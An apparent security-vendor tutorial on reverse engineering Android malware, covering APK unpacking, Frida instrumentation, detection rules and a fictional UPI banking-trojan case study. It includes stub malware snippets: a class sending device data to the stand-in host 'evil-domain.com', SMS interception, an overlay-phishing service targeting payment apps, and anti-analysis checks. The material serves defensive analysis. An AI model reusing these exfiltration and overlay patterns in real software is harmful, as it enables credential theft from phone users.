Android Malware Reverse Engineering: Complete APK Analysis Guide

TL;DR

Android malware analysis is critical for understanding mobile threats targeting India's massive smartphone ecosystem. This comprehensive guide covers:

• Static Analysis: APK unpacking, manifest analysis, and code examination without execution
• Dynamic Analysis: Runtime behavior monitoring, network traffic analysis, and sandbox techniques
• Advanced Techniques: Code deobfuscation, anti-analysis bypass, and threat attribution
• Tools & Environment: Complete toolkit setup for professional malware research

With over 600 million Android users in India and sophisticated threat actors like Sidewinder and Donot Team targeting the region, mastering these techniques is essential for cybersecurity professionals.

---

The Android Threat Landscape: Why Malware Analysis Matters

India's mobile-first economy has created the world's largest Android user base, making it an attractive target for cybercriminals and nation-state actors. Recent threat intelligence reveals sophisticated campaigns specifically targeting Indian users:

Banking Trojans: Advanced malware like Flubot and Cerberus targeting UPI applications and banking credentials. These trojans use accessibility services to overlay legitimate banking interfaces with credential harvesting screens.

Spyware Operations: APTs like Sidewinder deploying custom Android implants for surveillance of government officials, military personnel, and journalists. These campaigns often use legitimate-looking applications as delivery vectors.

SMS Fraud Networks: Malware families intercepting SMS OTPs and bank transaction confirmations, enabling real-time account takeovers during the critical authentication window.

Cryptocurrency Theft: Specialized malware targeting crypto wallet applications, exploiting the growing adoption of digital assets in India's tech-savvy population.

Understanding these threats requires systematic malware analysis capabilities. Unlike desktop malware, Android threats operate within the constraints of the Android security model, creating unique analysis challenges and opportunities.

Foundation: Understanding Android Application Architecture

Before diving into analysis techniques, it's crucial to understand the Android application structure:

APK File Structure

An Android Package (APK) is essentially a ZIP archive containing:

MyApp.apk
├── AndroidManifest.xml     # App permissions and components
├── classes.dex             # Compiled Java/Kotlin code
├── resources.arsc          # Compiled resources
├── res/                    # Application resources
│   ├── layout/             # UI layouts
│   ├── drawable/           # Images and graphics
│   └── values/             # Strings, colors, dimensions
├── assets/                 # Raw application assets
├── lib/                    # Native libraries (ARM, x86)
│   ├── arm64-v8a/
│   ├── armeabi-v7a/
│   └── x86/
└── META-INF/               # APK signing information
    ├── MANIFEST.MF
    ├── CERT.SF
    └── CERT.RSA

Detailed view of Android APK internal structure showing all components

Dalvik Executable (DEX) Format

Android applications are compiled to Dalvik bytecode, stored in .dex files. This bytecode is optimized for the Android runtime (ART) and contains:

• Class definitions and method implementations
• String constants and resource references
• Application control flow and business logic
• Obfuscated or encrypted payloads in malware

Android Security Model

The Android security model provides several layers that malware must circumvent:

• Application Sandboxing: Each app runs in its own process with unique UID
• Permission System: Explicit user consent required for sensitive operations
• Code Signing: Applications must be cryptographically signed
• Runtime Verification: ART includes various security checks and optimizations

Static Analysis: Dissecting APK Files Without Execution

Static analysis examines the malware without executing it, providing insights into capabilities, infrastructure, and potential impact.

Complete malware analysis workflow from initial triage to threat attribution

Environment Setup

First, establish a proper analysis environment:

# Install essential tools
sudo apt update && sudo apt install -y \
    openjdk-11-jdk \
    python3-pip \
    git \
    unzip \
    file \
    strings \
    hexdump

# Install APK analysis tools
wget https://github.com/iBotPeaches/Apktool/releases/latest/download/apktool_*.jar
mv apktool_*.jar apktool.jar

# Install dex2jar for DEX to JAR conversion
wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
unzip dex-tools-v2.4.zip

# Install jadx for decompilation
wget https://github.com/skylot/jadx/releases/latest/download/jadx-*.zip
unzip jadx-*.zip

Initial Triage and Metadata Analysis

Begin analysis with basic file inspection:

# Basic file information
file malware.apk
sha256sum malware.apk
strings malware.apk | head -50

# Extract APK contents
unzip malware.apk -d extracted/
ls -la extracted/

# Analyze AndroidManifest.xml
aapt dump xmltree malware.apk AndroidManifest.xml

# Or use apktool for better formatting
java -jar apktool.jar d malware.apk -o decompiled/

Manifest Analysis: Understanding Permissions and Components

The AndroidManifest.xml reveals critical information about malware capabilities:

<!-- Dangerous permissions indicating potential malware -->
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.READ_SMS" />
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.READ_CONTACTS" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.RECORD_AUDIO" />
<uses-permission android:name="android.permission.CAMERA" />
<uses-permission android:name="android.permission.DEVICE_ADMIN" />
<uses-permission android:name="android.permission.BIND_ACCESSIBILITY_SERVICE" />

<!-- Services running in background -->
<service android:name=".BackgroundService"
         android:enabled="true"
         android:exported="false" />

<!-- Broadcast receivers for persistence -->
<receiver android:name=".BootReceiver">
    <intent-filter android:priority="1000">
        <action android:name="android.intent.action.BOOT_COMPLETED" />
    </intent-filter>
</receiver>

Red Flags to Look For:

• Excessive permissions not justified by app functionality
• Accessibility service bindings (often used for overlay attacks)
• Device admin requests (for persistence and anti-removal)
• Boot receivers (automatic startup after reboot)
• Hidden or obfuscated component names

Code Decompilation and Analysis

Convert DEX bytecode back to readable Java source:

# Method 1: Using dex2jar + JD-GUI
d2j-dex2jar.sh malware.apk
# This creates malware-dex2jar.jar
# Open in JD-GUI for viewing

# Method 2: Using jadx (recommended)
jadx malware.apk -d jadx_output/
# Creates human-readable source code

# Method 3: Using apktool for smali disassembly
java -jar apktool.jar d malware.apk -o smali_output/

JADX GUI showing decompiled Android malware source code

Identifying Malicious Patterns

Look for common malware indicators in the decompiled code:

Command and Control (C2) Communication:

public class NetworkManager {
    private static final String C2_URL = "http://evil-domain.com/api";

    private void sendDeviceInfo() {
        HttpURLConnection conn = (HttpURLConnection) new URL(C2_URL).openConnection();
        // Data exfiltration code
    }
}

SMS Interception:

public class SmsReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        if ("android.provider.Telephony.SMS_RECEIVED".equals(intent.getAction())) {
            Bundle bundle = intent.getExtras();
            // SMS stealing logic
        }
    }
}

Root Detection Bypass:

private boolean isDeviceRooted() {
    String[] rootPaths = {"/system/app/Superuser.apk", "/system/xbin/su"};
    for (String path : rootPaths) {
        if (new File(path).exists()) return true;
    }
    return false;
}

Cryptographic Analysis

Examine encryption/obfuscation mechanisms:

# Search for cryptographic constants
strings malware.apk | grep -E '([A-Fa-f0-9]{32,}|-----BEGIN)'

# Look for base64 encoded strings
strings malware.apk | grep -E '^[A-Za-z0-9+/=]{20,}$'

# Check for packed/encrypted DEX files
hexdump -C malware.apk | grep -A5 -B5 "dex"

Dynamic Analysis: Runtime Behavior Monitoring

Dynamic analysis observes malware behavior during execution, revealing capabilities not apparent from static analysis.

Sandbox Environment Setup

Create an isolated analysis environment:

# Android emulator setup with Google Play services
android create avd -n analysis_env -t android-30 -c 2048M

# Start emulator with network monitoring
emulator -avd analysis_env -no-snapshot -wipe-data \
         -http-proxy 127.0.0.1:8080

# Alternative: Genymotion with custom ROM
# Provides better performance and root access

Essential Analysis Tools:

• Frida: Dynamic instrumentation framework
• Burp Suite: HTTP proxy for network analysis
• Wireshark: Network traffic capture
• ADB: Android Debug Bridge for device interaction
• Xposed Framework: Runtime modification (rooted devices only)

Dynamic analysis environment with Frida and Burp Suite configured

Network Traffic Analysis

Monitor and analyze malware network communications:

# Set up traffic interception
# Configure Burp Suite proxy on 127.0.0.1:8080

# Install Burp CA certificate on Android
adb push burp_ca.crt /sdcard/
# Install via Settings > Security > Install from storage

# Monitor DNS requests
adb shell su -c "tcpdump -i wlan0 port 53 -w /sdcard/dns.pcap"

# Capture all network traffic
adb shell su -c "tcpdump -i any -w /sdcard/traffic.pcap"

Analysis Focus Areas:

• C2 server communication patterns
• Data exfiltration methods and frequency
• Domain generation algorithms (DGA)
• Protocol encryption and obfuscation
• Certificate pinning bypass attempts

System-Level Monitoring

Track malware impact on the Android system:

# Monitor system calls
adb shell su -c "strace -f -p $(pidof com.malware.package) -o /sdcard/syscalls.log"

# Track file system changes
adb shell su -c "inotifywait -r -m /data/data/com.malware.package/ -o /sdcard/file_changes.log"

# Monitor process creation
adb shell su -c "while true; do ps aux | grep -v grep | grep com.malware; sleep 1; done"

# Database monitoring (for credential theft)
adb shell su -c "sqlite3 /data/data/com.malware.package/databases/*.db '.dump'"

Frida-Based Dynamic Analysis

Use Frida for real-time code instrumentation:

// frida_script.js - Monitor crypto operations
Java.perform(function() {
    var Cipher = Java.use("javax.crypto.Cipher");

    Cipher.doFinal.overload("[B").implementation = function(input) {
        console.log("[+] Cipher.doFinal called");
        console.log("Input: " + Java.use("java.util.Arrays").toString(input));

        var result = this.doFinal(input);
        console.log("Output: " + Java.use("java.util.Arrays").toString(result));
        return result;
    };

    // Monitor URL connections
    var URL = Java.use("java.net.URL");
    URL.openConnection.implementation = function() {
        console.log("[+] HTTP connection to: " + this.toString());
        return this.openConnection();
    };
});

# Run Frida script
frida -U -f com.malware.package -l frida_script.js --no-pause

Advanced Analysis Techniques

Anti-Analysis Evasion

Modern malware employs various anti-analysis techniques:

Emulator Detection:

private boolean isEmulator() {
    return Build.MODEL.contains("google_sdk") ||
           Build.MODEL.contains("Emulator") ||
           Build.MANUFACTURER.contains("Genymotion");
}

Debugger Detection:

private boolean isDebugged() {
    return (getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE) != 0;
}

Root/Hook Detection:

private boolean hasXposed() {
    try {
        throw new Exception();
    } catch (Exception e) {
        for (StackTraceElement element : e.getStackTrace()) {
            if (element.getClassName().contains("xposed")) return true;
        }
    }
    return false;
}

Code Obfuscation and Packing

String Decryption

Malware often encrypts strings to hide indicators:

public class StringDecryptor {
    private static String decrypt(String encrypted, String key) {
        // Custom decryption algorithm
        byte[] data = Base64.decode(encrypted, Base64.DEFAULT);
        // XOR or AES decryption
        return new String(decryptedData);
    }
}

Analysis Approach:

# Extract all encrypted strings
grep -r "decrypt\|decode\|deobfuscate" jadx_output/

# Use Frida to hook decryption functions
# Monitor decrypted strings at runtime

DEX Packing Analysis

Advanced malware may pack or encrypt the main DEX payload:

# Check for multiple DEX files
unzip -l malware.apk | grep "\.dex"

# Look for custom class loaders
grep -r "DexClassLoader\|PathClassLoader" jadx_output/

# Analyze assets for hidden DEX files
file extracted/assets/*

Memory Dumping and Analysis

Extract runtime memory for advanced analysis:

# Dump application memory
adb shell su -c "dd if=/proc/$(pidof com.malware.package)/mem of=/sdcard/memory_dump.bin"

# Analyze memory dump for strings and patterns
strings memory_dump.bin | grep -E "(http|ftp|\.com|\.org)"

# Extract loaded DEX files from memory
# Use custom tools or frida scripts to dump runtime classes

Attribution and Intelligence Analysis

Infrastructure Analysis

Map malware infrastructure for threat attribution:

Domain and IP Analysis:

# Passive DNS analysis
dig +short malware-c2.com
whois malware-c2.com

# Check certificate transparency logs
curl -s "https://crt.sh/?q=malware-c2.com&output=json"

# Analyze hosting infrastructure
traceroute malware-c2.com
nmap -sS -O malware-c2.com

Certificate Analysis:

# Extract certificates from APK
unzip -j malware.apk META-INF/CERT.RSA
openssl pkcs7 -inform DER -in CERT.RSA -print_certs -text

# Analyze certificate attributes
# Compare with known APT signing certificates

Code Similarity Analysis

Compare with known malware families:

# Generate fuzzy hashes
ssdeep malware.apk
tlsh -f malware.apk

# YARA rule matching
yara malware_rules.yar malware.apk

# Compare with VirusTotal submissions
# Check family classification and detection rates

Behavioral Pattern Analysis

Document malware capabilities and TTPs:

MITRE ATT&CK Mobile Mapping:

• Initial Access: Spearphishing Link (T1566.002)
• Persistence: Boot or Logon Autostart (T1547.001)
• Credential Access: Input Capture (T1056.001)
• Collection: Screen Capture (T1513), Location Tracking (T1430)
• Command and Control: Web Service (T1102)
• Exfiltration: Exfiltration Over C2 Channel (T1041)

MITRE ATT&CK framework mapping for mobile malware tactics and techniques

Detection and Prevention Strategies

YARA Rule Development

Create detection signatures for identified malware:

rule Android_Malware_Family_X {
    meta:
        author = "MetaCache Cybersecurity"
        date = "2025-09-06"
        description = "Detects Android malware family X"

    strings:
        $manifest_perm1 = "android.permission.SEND_SMS"
        $manifest_perm2 = "android.permission.DEVICE_ADMIN"
        $c2_url = "evil-domain.com" ascii
        $decrypt_func = { 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? }

    condition:
        $manifest_perm1 and $manifest_perm2 and
        ($c2_url or $decrypt_func)
}

Network-Based Detection

Implement network monitoring for malware traffic:

# Suricata rules for C2 detection
alert http $HOME_NET any -> $EXTERNAL_NET any \
    (msg:"Android Malware C2 Communication"; \
     content:"POST"; http_method; \
     content:"/api/upload"; http_uri; \
     reference:url,metacache.in; \
     classtype:trojan-activity; sid:1000001;)

Endpoint Detection Rules

Create mobile EDR rules for runtime detection:

{
    "rule_name": "Android_Malware_Accessibility_Abuse",
    "description": "Detects accessibility service abuse",
    "conditions": [
        {
            "event_type": "service_started",
            "service_type": "accessibility",
            "package_name": "!com.google.*"
        },
        {
            "event_type": "screen_reader",
            "target_package": "com.android.systemui"
        }
    ],
    "severity": "high"
}

Threat Intelligence Integration

IOC Extraction and Sharing

Document and share threat indicators:

{
    "malware_family": "AndroidBanker.X",
    "sha256": "a1b2c3d4e5f6...",
    "c2_domains": [
        "evil-domain.com",
        "backup-c2.net"
    ],
    "target_applications": [
        "com.phonepe.app",
        "com.paytm",
        "in.org.npci.upiapp"
    ],
    "capabilities": [
        "sms_interception",
        "screen_overlay",
        "contact_exfiltration"
    ],
    "attribution": {
        "campaign": "UPI-Stealer-2025",
        "region": "India",
        "confidence": "medium"
    }
}

Automated Analysis Pipeline

Implement scalable analysis workflows:

#!/usr/bin/env python3
import subprocess
import json
from pathlib import Path

class AndroidMalwareAnalyzer:
    def __init__(self, apk_path):
        self.apk_path = Path(apk_path)
        self.results = {}

    def static_analysis(self):
        # APK metadata extraction
        result = subprocess.run(['aapt', 'dump', 'badging', str(self.apk_path)],
                                capture_output=True, text=True)
        self.results['metadata'] = self.parse_aapt_output(result.stdout)

        # Permission analysis
        perms = self.extract_permissions()
        self.results['permissions'] = perms

        # String extraction
        strings = self.extract_strings()
        self.results['strings'] = strings

        return self.results

    def dynamic_analysis(self):
        # Automated sandbox analysis
        # Network monitoring
        # Behavior classification
        pass

    def generate_report(self):
        # Create comprehensive analysis report
        # Include IOCs, TTPs, and recommendations
        pass

# Usage
analyzer = AndroidMalwareAnalyzer('malware.apk')
results = analyzer.static_analysis()
print(json.dumps(results, indent=2))

Case Study: Analyzing a Real Banking Trojan

Let's walk through a complete analysis of a fictional banking trojan targeting Indian UPI applications:

Initial Assessment

# File: upi_helper.apk (suspicious name mimicking legitimate UPI app)
$ file upi_helper.apk
upi_helper.apk: Android application package file

$ sha256sum upi_helper.apk
f4d2b1c8e3a7f9d6b5c4a8e2f1d9c7b6a5e3f8d2c1b9a6e4f7d3c8b5a2e9f6d4 upi_helper.apk

Manifest Analysis Reveals Concerning Permissions

<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.READ_SMS" />
<uses-permission android:name="android.permission.BIND_ACCESSIBILITY_SERVICE" />
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />

<service android:name=".services.OverlayService"
         android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
    <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService" />
    </intent-filter>
</service>

Code Analysis Reveals Malicious Intent

Decompiled code shows overlay attack implementation:

public class OverlayService extends AccessibilityService {
    private static final String[] TARGET_PACKAGES = {
        "com.phonepe.app",
        "net.one97.paytm",
        "in.org.npci.upiapp"
    };

    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        String packageName = event.getPackageName().toString();

        if (Arrays.asList(TARGET_PACKAGES).contains(packageName)) {
            showPhishingOverlay(packageName);
        }
    }

    private void showPhishingOverlay(String targetApp) {
        // Create fake login overlay
        // Steal credentials when user enters PIN
    }
}

Network Analysis Confirms C2 Communication

Traffic analysis reveals:

• C2 server: upi-secure-api.com
• Exfiltration of stolen credentials every 24 hours
• Use of legitimate API endpoints to blend traffic

Attribution Assessment

Based on code patterns, infrastructure, and targeting:

• Campaign: UPI-Stealer-2025
• Attribution: Likely financially motivated cybercriminals
• Targeting: Indian UPI users, specifically PhonePe and Paytm
• Sophistication: Medium - uses common overlay techniques

Conclusion: Building Defensive Capabilities

Android malware reverse engineering is a critical capability for defending India's mobile ecosystem. Key takeaways for security teams:

Immediate Actions:

• Establish Analysis Capabilities: Set up static and dynamic analysis environments
• Develop Detection Rules: Create YARA signatures and network monitoring rules
• Intelligence Sharing: Participate in threat intelligence communities
• User Education: Train users to recognize malicious applications

Strategic Investments:

• Automated Analysis: Implement scalable malware analysis pipelines
• Threat Intelligence: Build comprehensive threat attribution capabilities
• Defensive Technologies: Deploy mobile endpoint detection and response
• Research Partnerships: Collaborate with academic institutions and security vendors

Industry Collaboration:
The Android malware threat requires coordinated response across the ecosystem. Security researchers, mobile operators, financial institutions, and government agencies must work together to:

• Share threat intelligence and IOCs
• Develop industry-standard detection mechanisms
• Create user awareness programs
• Establish incident response protocols

The techniques outlined in this guide provide the foundation for professional Android malware analysis. As threats continue to evolve, maintaining and advancing these capabilities will be essential for protecting India's digital economy.

Remember: malware analysis requires proper authorization and legal compliance. Always conduct analysis within appropriate legal frameworks and never analyze malware outside of controlled environments designed for security research.